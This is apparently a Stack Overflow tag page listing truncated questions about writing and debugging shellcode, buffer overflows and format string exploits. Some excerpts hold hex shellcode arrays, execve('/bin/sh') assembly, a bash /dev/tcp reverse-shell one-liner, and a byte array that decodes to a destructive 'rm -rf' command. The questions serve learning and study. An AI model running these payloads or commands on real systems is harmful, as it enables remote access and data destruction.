Tagged Questions
0
votes
2answers
101 views
Shellcode Segmentation Fault error when run from exploitable program
BITS 64
section .text
global _start
_start:
jmp short two
one:
pop rbx
xor al,al
xor cx,cx
mov al,8
mov cx,0755
int 0x80
xor al,al
inc al
xor bl,bl ...
-1
votes
1answer
58 views
Running shellcode works in debugger, but not by itself
I'm experimenting with buffer overflows. I've written a toy example which does the following:
building a buffer which consists of three parts:
1) a block with several "malicious" return addresses ...
-1
votes
1answer
41 views
What does this C snippet mean?
I'm a noob at shellcodes and I'm trying to understand all scenarios. I have found many codes to test my shellcodes in C, but to my surprise they are very unreadeable and I can't understand neither ...
0
votes
2answers
86 views
shellcode buffer overflow -SegFault
I'm trying to run this shellcode but I keep getting segmentation fault
/* call_shellcode.c */
/*A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include ...
-3
votes
2answers
103 views
Assembly works, but shellcode does not [closed]
I have a x64 processor and I'm looking into shellcode.
I have the following code:
section .text
global _start
_start:
push rax
mov rbx, 0x68732f6e69622f2f
shr rbx, 0x8
push rbx
mov ...
-1
votes
1answer
111 views
Shellcoder's Handbook: first shellcode example
I'm a little confused how the first shellcode example works. I've run it through GDB and I have verified it is correct, but I'm not sure how it ends up working in the first place. Here is what the ...
1
vote
2answers
130 views
Executing machine code in an array in C. Is this executing an Integer?
I am trying to understand why ret(); works in the following C program:
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\...
1
vote
1answer
134 views
Buffer overflow change return address C - without main
How can I get the eip register to point to memory address to execute my shellcode in the following program using buffer overflow?
static int __init onload(void)
{
void function1(char *arg1)
{...
0
votes
0answers
79 views
ASM [open/read/write] shellcode segmentation fault
I'm trying to write a simple shellcode to read the content of a file.
Here is my assembly:
xor eax, eax
xor ecx, ecx
xor edx, edx
push 0x73 ; /home/users/level05/.pass
push ...
0
votes
1answer
43 views
How the standards input passing stream different?
I'm a newbie in Linux, and exploitation. I have tried to solve some exploitation challenges and I realize some interesting things.
[1](python -c 'print "a"*40 + "\xef\xbe\xad\xde"';cat ) | ./ch13
...
1
vote
1answer
276 views
Executing shellcode in C (visual studio 2017
I encounter a problem when I try to execute a shellcode in C, (a basic reverse_tcp, pointing to a local address).
I started from the basics with the following code:
#define WIN32_LEAN_AND_MEAN
#...
0
votes
2answers
53 views
Executed shellcode terminates main program
I am trying to execute shellcode in a memory region. While it works so far, I am confronted with another problem right now: The main-c-program exits after I called the shellcode-program. Is there a (...
2
votes
1answer
148 views
Hello World in ARM Assembly without data section
I have a "Hello, World!" program in ARM assembly language and I want to convert it into shell code to execute it in a memory region. In Intel Assembly language I got rid of the .data section since ...
2
votes
2answers
102 views
32-bit shellcode executes in assembly but not in c on 64-bit os even with -m32
I'm working on a tcp-bind shellcode for a 32-bit system. The code is sitting on a 32-bit ubuntu and the host os is 64 Bit Windows 10 (do they even make 32 bit windows 10?)
The shellcode is a tcp-bind....
7
votes
1answer
323 views
Executing shellcode in shared memory with mmap [duplicate]
I'm trying to place and execute program-code into a shared-memory region. Initializing and allocating the shared memory as well as copying the shellcode into the "new" memory works as intended, but as ...
0
votes
1answer
321 views
gdb Cannot access memory at address of $ebp
Entire code is:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
char *secret = "1234";
void go_shell()
{
char *shell = "/bin/sh";
char *cmd[] = { "/bin/sh", 0};
...
0
votes
1answer
136 views
Difference between running an assembly program and running the disassembled code in shellcode.c
I am currently working on 'Pentester Academy's x86_64 Assembly Language and Shellcoding on Linux' course (www.pentesteracademy.com/course?id=7). I have one simple question that I can't quite figure ...
0
votes
0answers
52 views
Need help in understanding this exploit using the stack [duplicate]
I am recently reading Hacking: the art of exploitation. But I stuck in this piece of code.
const char shellcode[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\x31\...
1
vote
1answer
285 views
Format string attack - jump to shell on x64
How to exploit printf format string vulnurability on 64 bit system with NX enabled?
In this code example, what could you do to get a shell?
void f(char *buf) {
printf(buf);
exit(0);
}
int main()...
0
votes
1answer
82 views
Why it didn't print?
simple asm for ptint the string "/bin/sh" and then exit
global _start:
_start:
jmp what
are:
mov rbx,0x68732f6e69622fff
shr rbx,0x8
push rbx
mov rsi,rsp
mov dl,0x8
...
2
votes
1answer
191 views
How can you make the stack executable on osx?
I'm currently going through "Hacking; the Art of Exploitation", and am practicing writing shell code injections on some example code I wrote up.
I'm injecting shell code as an environment variable. ...
1
vote
0answers
91 views
shellcode segmentation fault although assembly works well
I created an assembly program to execute a shell:
section .text
global _start
_start:
xor eax, eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ...
1
vote
1answer
92 views
Iterating over PEB DllName shows only exe name
I'm trying to get a list of the loaded modules within my application (pertaining to security/shellcode so please refrain from WINAPI calls). I'm iterating over the PEB->Ldr doubly linked list of ...
0
votes
3answers
138 views
Is it practical to create a C language addon for anonymous functions?
I know that C compilers are capable of taking standalone code, and generate standalone shellcode out of it for the specific system they are targetting.
For example, given the following in anon.c:
...
-5
votes
1answer
295 views
C shellcode execution
I have a following program written in c:
char code[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20"
"\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65"
"\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
int main(int argc, char **...
0
votes
1answer
261 views
execve x86 - Segmentation Fault
I keep getting segmentation faults on this could anybody help me on this one, I am kind of new to ASM
global _start
section .text
_start:
push dword 0x0068732F ; Push /sh
push dword 0x6E69622F ;...
-2
votes
2answers
105 views
C shellcode execution issue
I recently get interested in Metasploit, and I was trying to execute some shellcode from C code.
So i've generated with msfvenom a shellcode for LHOST = 127.0.0.1 and LPORT = 714 (so if you want to ...
0
votes
1answer
732 views
Testing Shellcode With GDB [duplicate]
If I just execute shell code program It makes segmentation fault like this
desktop:~$ ./sh02
Segmentaion fault (core dumped)
But, when I debug this program with GDB, this program executes /bin/sh ...
0
votes
3answers
44 views
Compiling ShellCode Program in C error
I am currently reading through a book about shellcoding and I am running into some issues during one of the examples. I am trying to compile the code below but I keep getting an error about stray "\". ...
0
votes
2answers
118 views
Shellcode testing gone wrong
Hey I'm using a bit of code most of you are familiar with. It basically takes an array of characters and casts it as a function pointer. With this code you can theoretically test any shellcode's ...
2
votes
0answers
124 views
Shellcode Segfault - testcase vs strcpy
So after taking a Software Security class I became very interested in tinkering with how shellcode works with buffer overflows. Most threads I read about the topic involve having the shellcode as a ...
1
vote
2answers
2k views
Generating Shellcode from an exe?
So recently I have been learning about low level programming languages (such as Assembly, which from my understanding is just symbolic binary) and have came across Shellcoding (e.g. "\x4D..." etc). I ...
3
votes
1answer
594 views
Can i execute code that resides in data segment (ELF binary)?
In the way to understanding binaries (Virtual memory layout, execution...etc), I've written a C code that declares a global string which contains bytes of an executable code, then i overwrote the ...
0
votes
1answer
40 views
Desiging Shellcode gives incorrect results
I made this simple assembly program:
.text
.globl _start
_start:
mov %20, %rbx
mov %1, %rax
int $0x80
This is obviously running on a 64 bit OS (Linux). I then ...
-2
votes
1answer
383 views
Making my C program execute shellcode [closed]
I was trying to make my C program execute shellcode. Please look at the following.
root@ninja:~/Desktop/Programs# gdb -q ./a.out
Reading symbols from /root/Desktop/Programs/a.out...done.
(gdb) list 1
...
5
votes
1answer
538 views
Why can the execve system call run “/bin/sh” without any argv arguments, but not “/bin/ls”?
I am confused with the syscall of __NR_execve. When I learn linux system call. The correct way that I know to use execve is like this:
char *sc[2];
sc[0]="/bin/sh";
sc[1]= NULL;
execve(sc[0],sc,...
1
vote
0answers
44 views
Shellcoding problems at Basics
Hi and Evening to everyone
I am Venturing into Security , but i need to understand few thing, buffer overflows, etc now i want to also know Shellcoding
So i got my CFF explorer ready, got my C Ide (...
0
votes
1answer
418 views
bash -i >& /dev/tcp/127.0.0.1/1234 0>&1
I know that some part of the above title has already been asked but I still have some confusions. Actually, I don't really get the ">&" in bash -i >& /dev/tcp/127.0.0.1/1234 0>&1
My main ...
-2
votes
2answers
69 views
Can you help me explaining the following C code? [duplicate]
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
the variable code has some shellcode in it
0
votes
0answers
152 views
Shellcode Without null bytes
I am trying to convert an assembly program into null-free shellcode.
However, I am unsure how to go about this for certain instructions. Some of them way more complex than the examples I found in the ...
-2
votes
3answers
116 views
Pointers to function
What does this code mean?
char code[] = "bytecode will go here!";
int main(int argc, char **argv) {
int (*func)(); /* This is pointer to function */
func = (int (*)())code; /* What does this ...
-1
votes
1answer
181 views
This shellcode and headache
Good afternoon. I've been looking for a while what's happening with this shellcode. This is the asm code:
add esp, 0x3c
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, ...
0
votes
1answer
103 views
Why is this shellcode causing a segmentation fault?
When I run the following code:
#include <stdio.h>
#include <string.h>
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\...
-2
votes
1answer
241 views
Aleph one code - buffer overflow [closed]
I got this code of aleph one:
shellcode.h
#if defined(__i386__) && defined(__linux__)
#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\...
1
vote
1answer
858 views
Can you explain the method of finding the offset of a buffer when looking for buffer overflow potential
I'm looking at aleph's article on phrack magazine. The code below can also be found there.
We have a vulnerable executable which it's code is:
vulnerable.c
void main(int argc, char *argv[]) {
...
1
vote
1answer
111 views
Program doesn't respond to the shell code passed to it
I have a small c program on my local environment. This program receives a payload and outputs it.
#include <stdio.h>
#include <stdlib.h>
int main(int argc,char* argv[])
{
char buffer[...
-1
votes
1answer
218 views
run shellcode stored in dynamically allowed memory
I have the following wich run a shellcode which works fine:
unsigned char original[] =
"\xd9\xee\xd9\x74\x24\xf4\x58\xbb\xa6\xfb\x51\x8f\x33\xc9\xb1"
"\x62\x83\xe8\xfc\x31\...
0
votes
2answers
491 views
buffer overflow exploit change function call
I am trying to perform a buffer overflow to change the call from function A to function B. Is this do-able? I know I will have to figure out how many bytes I have to enter until I have control over ...
-1
votes
5answers
300 views
Reverse engineering assembly code to C
Would someone please provide me with assistance disassembling the shell code below (in the comment section) and also explain to me the role of the last line of code?
# include <stdlib .h>
# ...
4
votes
1answer
1k views
Find buffer address to create shell code
In my program I am trying to modify the EIP to point to buffer base address which contains shell code
example:
0xbffff5f3 is an address on stack which points to
code[80] = "\x90\x90\x90\x90\x90\x31\...
